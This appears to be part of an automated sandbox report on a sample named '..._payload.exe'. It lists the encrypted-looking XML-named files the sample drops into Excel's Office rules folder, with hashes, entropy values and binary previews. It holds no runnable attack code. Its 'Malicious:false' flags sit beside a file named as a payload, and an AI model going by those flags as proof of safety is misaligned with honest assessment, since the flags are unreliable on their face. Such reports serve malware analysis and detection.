                                                                                                      Entropy (8bit):7.9846392699058955
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:iC7pEY8eAaotnoHwI5C+OHl0yhrExu2Et0VrVb3QWsf61cIpJeG9YyU/1f6UWbMk:zyWcnDI58luEcEff6rW6UWBV
                                                                                                      MD5:5EB8900A92F51E958A60A2F0A9D736A0
                                                                                                      SHA1:CBC3DF1571BBFE6131CDE4D0279AF13791D645BD
                                                                                                      SHA-256:A6AD72D4448F47659719154BBF348B026C026689B7687B6382DDBB38E4A2A5E9
                                                                                                      SHA-512:14801268BC9C08E542E75648F99600CDD5A0B24EF95CAC36773D1491F6D2A81E349C190991BFF087CBF704095504792FFF3FDE0F2055CA01EC28FC6A805FB99D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.q..Q.(..."i._[&B..f..3.V.....D:D1...Ndh.T..m.ma..S...U.._e..$C:z.|.F4./...>.j...8..._.rF6i...M$...&.V.l..Bd.A(.:.pc.~_w.ms....bi....;m..@..k...+Bq+Oi.T\.*....M].s..,..X..v..Z[.F..C[..g.(q.z.a......X>Al...~.o...D..yb$..#...._S.z.3...-t.A..!c%..........n3.C...}..g......t.HR...../..w..|....@.3I....a...|N.q......[.\..0...:.]r.......#..y.....`...e.)1}.....b..NPU...g...k..y..\[<..HR...Qi..Y..k#.....v......W.B.....R.w...q...;.Nx..+.....{~7.2x....d.$.z..V...J...o.-..t...cU......{.Ad....?W.#.7.Z....%....1......&Pd.Ve-....s..#...6A...Q....tz...<.g. ,.:.U..I.. ...Nw.R*&.A].z.k..T&.b.b......8..-g*...g/q.8<...c..H...w0J.BF..........}"*Pz.o......6P.7<.}.Rd'&o6.TC.].l.....n`....3cx....}.b..(.E.....w...-M..<i.A...C....h6...+.<N...^o}.XB..{..1.[...t....i..cC"..".....H..:.`K*..1r|-q....?k.'.....C.......M.....:...V..B.MK..(.w...E.9.-Z.4.^"..F..R..&..KUN.....P...W].<{"F.,.B..@$.H.h&..T....A-....}EEO8.d.....I.....:5?.".>.y.FuiQdd...o.8.V....j...WS[.m.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11464v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):807
                                                                                                      Entropy (8bit):7.780658001914785
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:cAe4ZY6o/YPbUz8r4xBXN9ouXqM4zv6bD:cAe46/QNw99RXKwD
                                                                                                      MD5:785BE5C075E6118306C9BA2AA71B8257
                                                                                                      SHA1:7D4B2731AA994B8203C51E5DA93DC4A63CEB8BFF
                                                                                                      SHA-256:3FE596C279344500068F62DB541F783DFA8B30A5DAE2B87F0924B656EB32C5B4
                                                                                                      SHA-512:3560B82CAFBC91EC564FD044335367E379DFEC6101A273D4E8224D3E7F16FBCBB959C335364AE6AFC7621E172CCABDB8ECE9885B7B2B3A809F65FC0A095A3D09
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml+.O>Y.kX.!..W...$k.....e...f.......6...m.MA..u..4&..r..S._..C.K.y...E...h5.......}....UTH.T[...vc...dl.B........U.M...n.u=.*D.@....K.5....ErC5......_R..7..1s.I.4..`./.?.ly.......e....8Ueet . N..d...P.7..G..W.7.S......|...W.j.*-..Wf....:...-."K...x...1s...*..d..'.~s<J..`.Fo[=h....<[.G..h.q.......V.y.R .i=.Ikc"....8.il...?.*...........$......TW.#)X...........rI|.....n....V...:..a..n..Nm.fu.....C...@h..(...\.".5cm............l@l._...y.;....<7...3j........Z.... .:tn......c.......%...+.tG.}.....-.^p....4.1.<../..l.h...a...z.Y>,89.@hN.4+.>..W>......<.;v."_.k|[.+.:.fx.$.....p...Y.%.c.e..Q...D...S..7F.*}...yv.p.......f...=..u3HZzt4.>....2: ...t..1K.C.....q...a.[......_&0TG..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11498v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):747
                                                                                                      Entropy (8bit):7.708882245889948
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:LI3dlm3vdcbFkNNa+U018Ct5kEmOoJX+aaywP4ankDRmbF37AXw6Fyqv6cii9a:Lidlm/dMKLpWCfWJX+ajBDRY3q/v6bD
                                                                                                      MD5:8D12DB86B3B658DED0FF1875310102A5
                                                                                                      SHA1:F4ABFD6D5F3B45101BEC7945E54FBAC1E7A8B63B
                                                                                                      SHA-256:FB7C76FEA06EF59DFA1438FD0B4EB2691C91108C26D60486BF8AAD0B56B357D1
                                                                                                      SHA-512:41AD54F5DB64907BACD8738D46B73ED49884BA1A7C83A95AD8C3076BDE974118CCDD281F14E0F72FEBC05E958696C42E79E08C5C2F0B8BB19ACAAD7FF3CB6D4B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...*...h.+.N..q..`hB'.&u.#a ...d..Kr.:)q.;.<v{...n:.g_{.RN.cg9.#...7%...3..9.kR:.R]...4)Bk.".3....Y...X..<.a.=..c..`......4..dRY...V.........8.jb.-.....%.4.h.~.]...*...-*h?wx..._.....9.....~.~...'D..e..I.....)i=K[}....3I./._..j...)m.....Y0.y.W...X..<.Y.5.z.......In=.....j.WLZ.(.Y.$w4..u.h.. .1........pL..}......wa..G.V..^....D o.-...s.......8cv..{.\q........(...r.......9..T..f..............._>..j`.$%.....{..C..$].....:0.. M..b.mL.......n...Z.z,..............._.me.na.........qE..&..u.?\..)Cw}..i1N...gf.n...Y.....Wb..d..7-9....0H.....hf..Q...._..(..;........jX..tf.6.Ke....<{f.m0.S..QW).#.N....kM\......*Z...l.S.."n........&...x.....&...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11499v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1786
                                                                                                      Entropy (8bit):7.893551851385292
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:VS6LmgUkUeErJ6YrqpjuYWanp7jY8/cF3yiFWwD:ckKeErJPqpjfWan9jU3yit
                                                                                                      MD5:67EBDA5D2DA9280C82B229D90C83A092
                                                                                                      SHA1:9C2212BCE7FC8E65AEBDF530E7E671B49D4D9F73
                                                                                                      SHA-256:0B5E763B5E5F2FC401A6B4992EB28AEBCB826B69A4CC4E05F2840CDB5C0ED4E3
                                                                                                      SHA-512:7B1336E5643B3C40C230A78CF5FB799317D0F0A056C8023B07C9632785AC80E3AC09CE3898D4D171D8008F8005FC26B116E1F48006E462433250E65AA31626A7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmln.C....D...........!6.$...\....f.X.._5..C....Vt`B5.........u}O........k*...:...m..."F3.f7.>8.I...`.>O.%K"......5.;..g;...a...[....).}....CD*......A..a.._...@CN.;....mIq..f....@.%...}%j..di.$x.jd...!....C.F....}.)V[..e.....Mun(..........U..V.;O......3.z.O....\....~u$w.;.d(D..n^...)S....p...2[.ED.Q{F...i/yX`.....5..A..1+..KH....yo$....$...b..uO.."2u...KT$...K....3..........?.x.......g;%...J1.hYz..:h...v.9.w.0. .2..{@...-.r3.........&d......q..vs.e&..j.*.=.......F..d....&.1...0k.#...m|E.l.).........&....K..g3g.G.y{."\.aE_!.E....e.0....:......W.&..(Gr.w.s()....7x..).............9.Z.@.r.iUY..p.....ux,..4T.%...m...M.-e#..............c0.'.tEt5.S.p...:.`'.W .d.....'..'..)c....|!*+...`Z...(..c.@G..'..?.nKy,.....x..R.1w4kt...t..]...P........!6)v.a.?I...ll2.zB..Z....laXCxj.3..u.p....6.j......<Q?...j.xm...(sN.E....]D.... f....q...w..*.v.......g.1<.6.*fpd...}......-R?..U..r.....y..B.@..p.L..%[8T...1.....N0A\..&t.=U....`....,2.G..pK..XmX...6...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11500v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):886
                                                                                                      Entropy (8bit):7.753620311688445
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:CYaqvMXjcrEoMxq3MiX8ftbNzWr77v6bD:bnvFI8ofXqrHwD
                                                                                                      MD5:F523DF2DE7156243DF8AF5B3607CD2E1
                                                                                                      SHA1:ABCDB274E28435175EF9DC9EAC57B4D8AD368006
                                                                                                      SHA-256:A7CCA5F02220F37B07D3ED1E9B4AD3D41A0F844DF35F523A9B4F68FEA02446E2
                                                                                                      SHA-512:5BED967F880997D90B77B71A1C7C7EA94FF25B831BB57E46B3C71BC03C00A2F824AEAA534DF900CC99228F50EE9A9CE12630B411F087BE230B8E3B9D0A689B0D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.f.tYh......n.~,Y...x08...v......;.|.....(..Of.)..l.8..T..}.+"8p...!".@.Z.e.!.'.B.].\M.".D..Q....]..G]).9.M..t^...S"...1f.`.O..d....'.5\I.M...n$..Hg.N.......B4.7.R...c.G..:@....OU.3.|A......H....9....P..........W....h/...&..t......^...+]....A..z4....'7=k../..9T.|kL.w....e..N.wB..G..K..N..k._c.*.:!0.P..;L..s......NI)...l..o.c....x....c(...B..B...../....U..o.....x.TZ3%.......f.>..8...7&]s+.w.;...%..$......DI)...Q"wc.O.S8v.{..{.^*p.P9.?..U.i.-..h..)..,{..2......f.~..q..."...;..[.Gp....l5p.A....{..^Xb.....Y;..c.-WW.q..e`..1........B..v.l..g...H0^..A.Y.k.>../..9.J..~l9.....L..n.E.K..Y...s..Z../.r..X..../..t.{....g.r:.G.(.4@.v...s.?.....2..<....}.Q.B..V.T..8X0...&.O4P.....L./.|p.Q.L...t5....... ..8\.-{Jg?ymA1..s#.Sv.u.D:.6.Fl....+_..2!|_....~|..>.....E+...c.".hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11502v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1324
                                                                                                      Entropy (8bit):7.805288615490079
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:H9Zy8p0Gp6u/CJ+wg2lYXfhxz1xiLtmiKxmqsZsC2A8v6bD:dZ7pp6mkXlYfz1xiLEiKxzzA8wD
                                                                                                      MD5:48153FBDDCE6ACD1A41D52A81C1A8DB5
                                                                                                      SHA1:8371A446A47A6D93B717863869BC3D4991190133
                                                                                                      SHA-256:C7BBA2515B0BBE81E02D900C33E7987087C6C0C9F78EB43461654FD0FF53DBC8
                                                                                                      SHA-512:10684FA7B23F806E2281D867F2BCE15823A0755E056FDDC6369D3229F5741C441A24B2F811719E9714D99209822CC9BF383B1F4A4E704BC6CDB3C7794A022DBB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....K...../.e$..gtJ..U.6.......T.h......v.7_..:V.7.W..0.-.h...d.N,.<1oU....f..!5....E.BZ.....P[.(.T.yI8..P'..#_h.....5.C..%.\....r.38...l.v ...2....3b..7?mp]....M..l'/.jQ.H.S-..M>..5.=...m....a.X6........)....T.k.m.52.......n..&..Cq@............]..>..{`..:.x..kp3"....m....n.#@X;=R.#...|..,MD.e~...=%...M}1F.1..Q......<..tZ....m%(....-.Z..]B.>...F.\...@Y{=.A...+y.=. }....tI.y..B"K.Ms....o.=...tl:..c..._. ...{z....U..c\Xm.*..)...<>.p....h..."..m.!.mU0..{/.zb+j..{...1.<..-`.)....x........;.y.k...;..hC....F.....;;..Y0........~.qO..x..?.p...n..y...0x..2...I....U..V.P;......N#F..>C..$.............tW.z,n.Y..|....r#.+F.f............P...... .r..:K..f.c.............r..5...vh$.m..z...RJ.e..&..U@.{...wwr..b..in6..@g6..K0.9..:...i..N.E._.......\.E....#51?op.3T.....;..$.].I..H...@T.=w......yn...+[)..X ..`.j.g#.....y..I-na.k..8m.8.28...p..2.-.M.r......F.1...-...G..).UT.%>XZL.1T.......o`.l...g[...503......}..t......=97.?.J+.....y.83.......N......MP=sE.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11504v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1435
                                                                                                      Entropy (8bit):7.8547982924864215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wp4rXkOcRtOqhcUQUXreVyxHrFVPedGPx/LtTx/0bGyfmQRrPXFRTBf2dGYnZI1q:wSRlUcoXr8eLed+LH/0bffnRAGYFfmns
                                                                                                      MD5:A06EF3F87F06ACA4F019D2AF928FA1AF
                                                                                                      SHA1:693976A40A5BC3490869E5679BEFDD680524D30B
                                                                                                      SHA-256:207AEDA84B1C37FBA46077C8374D975586356090273055087946DBFEBABD6F0F
                                                                                                      SHA-512:8DA1F50AA3009EDF6AF2480D2B8EB5178D3530D58EDA7C80AAF03B69890F867CE7651FF01438DDB9FDED2075FFA4574DDC3CA5395DF8DA7F6A0883679BCF3385
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..F..T.Ps...`... ..%.:...I..+'.@@...d.F...w..Ye"..+.4.;?..>.s].q2..,.E.)...c..R8dq/"..A.?8.+BxT.1.}......f O(_..`bV.,.x.].......?._...I.......(.X..=V!X.7..0=...aM...Eh....=..".N...Z.b!7(:`S/YP..Q.aU1...!K6N.#.$:.sx]B....r........j.0...+~vn.!..@|O...c..h.......&#.m'LLV.-...GP.1..............>G.m06...+.]...d...G.<I......wN.I.x=........O..2..`..t.w...E.E...}........!..1...j.(].....4d..(nJ.....e.?....`...J.!,....D.$.C...2..d#..b..'.......YV3.i...H.....j.)qb...P6..d...(.^....X..*....\./.dun.a.5;P!^>.2..x}j.q=....L:....W....2"c.T.H+..=WM....aW..e.............-..g/..T-~FS....yH|........A..h.x. <f.Z0..v.....>t.W.<...D.?.`.(s.0].y..K....sU_k.,.[.!....|m./:....q.m{....cg....E.'...e6B....@L..Zzx....8..x{r.....8.5..m..Etu.S.L.../w==...ZaW.K.U........j.l.....].eK.F&..M.cA..`.+..`...qnZ~N.|.......)9.&..Ul.E.n/..FQ.....+<^,.y>.e....uQ..f..r...I@....I.K@5..[...V.I.<K...*sqU..9vC)....|.2..E.K.=.TA...x.57...........Q.,......M..MR|...C.l..Nl>9z

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11514v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7119
                                                                                                      Entropy (8bit):7.977573135078156
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:35LINjv7jfegID3FVeqmHP2eE2f5h7K6I:pLyGBv/Evv7K6I
                                                                                                      MD5:3F25C72247E2836FDB787B7C4E510EFA
                                                                                                      SHA1:8BE0BD1642C80B9A60582BA1340FA60F030E0B09
                                                                                                      SHA-256:AE54C27BB0282FF0A3BA877767630B4FA815B7A3A95005711F86C27695CF10E6
                                                                                                      SHA-512:528AA370678716A65C2B7D1945EE695AB2E68D1F5DB89E5D517A478652D74A22908E61BB61A8D740F019EE0D6E28C2D4762F25F9A179FAC79A2571700DCCDEA3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....b.c..i....../.....@..~A.......Q...S.o+;.s..S...\...1.i...M......&I.....n..(q..Oq......B aY<.Y.X.5t>.!.}3......O.....Z.....c<.)=......4.....r'...c-....bs.#f..E.S..]......'..z.T&....r.....x...^.d.R:18@..F.^...|.K... .f..6....a.H....tf(...0..g+.>&rV5$.e#..T},...x.R.O...............r.....&...3.KQIIvo.........__1M..}..N..$...g.|?[5O..7.*.\6H..$.l.....q...x...u..........."...s.2.:|6l../....VnZ/...u.$........A;....Wi....j.z0.@.......\......^.z=w.b...#........A...U.h....X.7.Y.b..G.G.t...jI'.u..+..QY_.H...ak..|1..Je(.....`.....4..jMN.....I...W....rEz*.."...`.+. ..(4..J..+..Y.P.[..".U.sX..i....B\.._y..v.$.P.)..../.m..}.Bn...B<?A'.S....0...Hi#.1..c..a.1CR9.....!..;...".#...%.....*.j^..17..[.~.?s0.m........p...*.....M......z!|_p.B..*3).<Z.vG5~.k..0...............U.(j...I.a...,.v3.Oo..b......a....`%:.D..%&.].A^...96...L..A..H.k*Y.zu.3.-...C..3rA...v.D>...".g..."Et.E.;......8..=j..[.$..I...4..& ..0..3`....@.V.....O7;..;.....E.....m.9. .J%o......ab

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11659v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):762
                                                                                                      Entropy (8bit):7.733646063469224
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:3I90J95G7pep2JaojgPuQ+DorTqv2TanZ1t64PMkzZhkQiS9r5su4Kv6cii9a:Ys95cUoJgqqqvOang4PMkTkCsu4Kv6bD
                                                                                                      MD5:44932367E72D2BA3F9C2F0B2851A8013
                                                                                                      SHA1:08F691EB79658BA0B4E17028D8FEEB7536DED527
                                                                                                      SHA-256:DC716B5FDE408D9530ECFBADF9B32E8E8C9A5F3B25D7C3861C9DA015640D2D2F
                                                                                                      SHA-512:41D8693D6898770D25464A746EB25324852EE7C4EB86C4983A162765E1C5C0195105427141159397255CFB789767ABAA1989A40ED69C04CB22B8FB7458BF915A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlZ...Q;..C..L4.8.SX.Yz.E...T.@.p>..d.S.....F.@..7-.6u/....&W.....I..9.1.I...yV}.sH..t...jx.$.O..I(.J.?.-MnL.......|z.vDP.}.h...k...z...j..N..IU.@.....R..f9...(.;....g.~...!3&`._..x.O....[...E$.:^.Y.".@[...1.+ 1..6...q...5.Dpn[W.|y.5...SY..kik5..m*.[....?...a.)[...i.i.3a..$Sv..Sw4`bH...<"._%......A..|.Z...~..r.8.*...4.)W.x.M;..~.}O.(k..k7 j.]..2.......8o0"......Y.(....@.A..+....Y..&..$..)..T..4...R.k.~i.7.+.J.h.:.6....:..u.8S.o..z.[t...,.m@Q.!.V..i..qg.M........6G.3.......v#.M...dVb*x.@...G`P.-..H.....Jf.1....U..&R........0........9.m.f....e.......kpF..O......&.Ad..@....d..lG......H7......Ac.....k=.F...w.T...!"....HT.e.p.....z.Rw....I.w...{.%.._-{hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11701v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1463
                                                                                                      Entropy (8bit):7.865154036366533
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nzOPDzIXcWGMI8PIXR900pvYXF8VG8DxiearB2BalXwv0hwIdpeXEaqicgKSv6bD:eZzMIVXRqDFbgTars8lgMhwSUc+wD
                                                                                                      MD5:A6951CF1D0A0F8CEFAE69BE8169436CD
                                                                                                      SHA1:4C6DBFAC360DAF550938B3B7082F058AD6578754
                                                                                                      SHA-256:A46D078DCF221E3DED930876A816F8224A515BC5A4B3529493FFC0DB9F4AFD2B
                                                                                                      SHA-512:796AEB0CB9B7ACF162B8277E748A97B5121EBAC7C1C3AC33A4FD9B0AA1A009CB80844E9778B6A9FE192C006872EC49AF5D98A239EAA6DCE8B99A431BFC62EF8E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlc.".uX..y.*[o..od..4.X....q...q.Y.N.......sy.[E......c.......T..zWx3.../.,.6......b.L..P......y.7...9.#..H.=.@r..R..Q..rj...6?.g...i...H...(...y-...p4D.l.q....o....7.T\.r..q..<..2M.s..S.q..r`.8..Bl...?`.FH..S.$..W.(...q1...#.......F_...p.L..8... k.....t.......M;Q....._.K*..(.O._n..]0r".yK..v..c:Q....G.......I.....):..Q..&h..n.x.8.9.Ao.......f../*./...|.?.....X...1..q..j.J....`;.....cE.e..{4. ......-)....IV....A.J*...Ts...=M>>Z}."pl.f........L.5....]..L...<.......u...Xw.}s....!d.bF......Q.q\....O.J...w.{,......K/r...t.I.cwD.....rI...{.w..r..}G.@.G.w$%GFFc`K.R..8-...V...=.5.../..T^..D.R.l.\.....MN...#2..L7`...?.$.V.x...h!T.j"....J..j~.'*.Z.+...NI..Y.a..lV]....z.v'.0V1L.3.AP.1...xR.B.0..}]..C@...P90OO1....iS.....y.s.o......@...1...,.M...Q...f.L....V:..FK........l...D.UK[.]_.Vz.<.#|.L...N+.l..7..^T(.....[..8`C.7k+..ch.v..U-.C...J*p......g.N...m...nh....9F.{[....3Q..K..1Q....M..1...)....(..<..m.Z.I%.}g..v..1i.....W...T.v.j..'*:0.[.~m.O.e.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11705v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3505
                                                                                                      Entropy (8bit):7.949532596565958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:5RNtnlYmIsozbr40eYSsHvvjsLHRQZAr1NQ:/G1zPyXAqHRQApW
                                                                                                      MD5:005CB90E6DBC6F8C47ED97F7C58C2BA3
                                                                                                      SHA1:2875AA775DE69CB4C6C8EBC09B1DB73A027F533A
                                                                                                      SHA-256:AC4BEAE37CF4F380D29CB7794C1D737E4BAEF35884F385C42BF476E443609F52
                                                                                                      SHA-512:AB951B2F8EB0E21993DD4ACE11BD867DF3F26C18E4601F442525411AE33AB68FB71AF77950F1308EF2CAED618618B01A36897A00C1BB873025C45B22CD3C30F4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..jp..3_.".....Y.....5.f{.h.....9...'...W.1/..M.k.q.#....n..e.-......J..'w...T... .T.i...|.V<~..;.$<.\....bMI..`M9.R..rG|.{...0..'K...|.K/UI.....`.....-N.J......K.<-E.+F.....B.....z9g..h-V..ii..{8....E>.S./x..".-.GB)mW...W...75G.y.o.C..b.).....i..E.c`1]&..f...m..A#.c..;.x...[2..X.<.;.YJ2...[|..a......?.pNH..e1.K.....f..I,.9[..8E@..'f...:<3...V...9......I'$.7L...l..dA[!......I.A...^qS.Q...!.. k-..e...<...6..<0..bC-....^ZW.2}.....P{a.i.q....:O#J.g......y.[...7.e.&.V....T7D{....?.V..;.>....l.Y.g..X.F...$).=E..s........i....K...L..hL@.=.r.*.cP..im.q...../p..\.B~70.IH>X.........xJ;........W<.b.....[#n.Q..:..Z..j..n..}....qe.i.1....P.l[..........'.iip...iP..q.....j..-.G".!;....7..E@.........n.-.......lP`....>./>.....&.`....I.]..l...,w1...jf.j.H.....\..=r.y.|...p.h.A.,...hv..F.\......F.-.(.g.8@....2...'G:..:..5T8T.3*="..4.J..../.7...y...../.`..r..GC8..O.? ..J..D.-..7........7j.,....Z9~^..ehV....}.1.4.*...v.%.)`.......=.....(..+{.|.7X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11710v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):965
                                                                                                      Entropy (8bit):7.750524762601977
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:op1BzeXyjUZs24qjeqmSc3buJhzA9re9C+ywKv6bD:ozeXy4Zs2sZkhzA9rwC+WwD
                                                                                                      MD5:E4A35262B9738D7B0AA2EC82049FF5B4
                                                                                                      SHA1:4F061311131FA1E36FD289CEC4DE21A0FC633B2E
                                                                                                      SHA-256:64D735C0BD63E83AA5129199F768C4F2E4E6764D0BED679A297AFB970D691EF0
                                                                                                      SHA-512:3DD6CD2AD5ADAE778401D90D1EC6561C1242099B241722A980B1D29BA1E6187F23A8B1390B1EF75AA7737D8AB57FAE531EFE632B99A79E1BDEA9ECBD3E9A699F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.........Z..l.....DX.[.K.t..y.sQG.k%.aib...="8Tt..L5._.K...].....#...."..u.}.[....5.......t-.:.K`..~D.<m\....M..d.^?..UB.}Q.>2}xX.[}.7gP.V...c.}...kv!...MI........;va&-@..!..5 ..\Kd.0.>.o. ...'.].....<Gc....}..yj4...&[..5.^.b....G\...F..............`...{1W....1c.].[{....^..u.fg.......?}.5.t..c...G..xr..Qx/=.........}.N.L...wF8..4..O.#..Z"~.7.c..jx..$..1.......Lw.*.c. .[.....&..H.f.....A....Y....q.SU...W:}.[Ch.,.fG..&9..)..alL..w..In"..e.#P.1.wU.).O.0.$2.P..C.G...vR..Z..t.c8...R].aD.<,.....M.a.P....SS2.B*.......N.g7w..c;@.....h..R.hJ.e..*...P...t?..c...Pr..4./~k.R.^...&m{.yr.y..f T].f..L.e..~....-sc..t.Y..'1.b..R.NB.5..cZ...."..C....P/z.,...$..Np..F.;r.&...K(.g.Zz....k7.e{...9..../v.5..Q.g.}..5...a.!.4f~.l9.pg.z,).SJ9.\.{.%.R.i..b$...xq.v#aF/dy.9.Q......*t...R.;%....U.<..V.N.G.o....XW.k}......G..Ap.J...c.Z.;.c..h...l.W.*G.g.F..m.P..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11767v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2983
                                                                                                      Entropy (8bit):7.924854051936727
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nlutol0k9XyraYD4jEn1VRydq+grbnx0mNkJpce0qEFwD:nlutoy8yFDcURydq+gl0qapcelX
                                                                                                      MD5:2502EDCFBAA866B779446FF327DD07FB
                                                                                                      SHA1:11023EB52E1F14FAB688DC61B0DD9B2589F2E9CD
                                                                                                      SHA-256:14575B7EBC0D07DF3203DBC13E978D9899E024E09CCA37F50F05D2C7226F379F
                                                                                                      SHA-512:6B8B4ADBA32C77100FA43ED24E17CF5BB5A34D7DE74067F5BD3E6045191B0D63E11F218E23BEBF7295FE7C9451D839EEB9377EBD74E4D307080308D0E0D79CF3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.F,.,}bGSbz.;}.g..........L.K...e&.kZ..5.-..%e.)'.......U...dT#.......!P.}v<jz......J.e..a3.{f9.^.u....*..F..?.....S..4;.....EH..P.m'Y...,R.\yKIH.&?<r./.a....w_.3{l..(...O_...7.wr.q..=..'.0..'.+5....Q-Qk.K....Q 7.YU.Y.uv.G.p..v.......]n.....Y..aj..;.O...l...Y...O|x..:........?.....e.]!..`.Y.k.A.w9...5..xw.........2.q.....W6....{V..i.=.HY...R...g.c.y.v.....Yn.bgz...d..}|r'.Z.._...=.d.f..l.0..u..g..xP9..gfs}#..P.v.......#......P0..M>v..T..)...['..#..*..zR.8Q.V...X.....@||....._..7.....k_..`...z..0bq..?...S....u.X...ghD.u...>L..?...w...hb.E. ,S!.e.@...1......2l..R.8..{&......Q...a...U-...[`._.S[E\...N..!9f.4.z.c......K..L.u..tw.z@..F.....v\..8/....;w...z.y......E..8v.......p...Y2...(yO....!Tu=.nr=.."C.qHy..+.C.._.|......-...b.SLz.....x..R.......".........I....q...:...1......b2..e..z.....'.P1.Y...6|......+.].QT..'...H.&]g.|...s...n.M.......m..fk.....y..W<.......x.:.S..x.:K.m..X.v..4. H[@D0c..0...E..n....;P....R.Q...8.

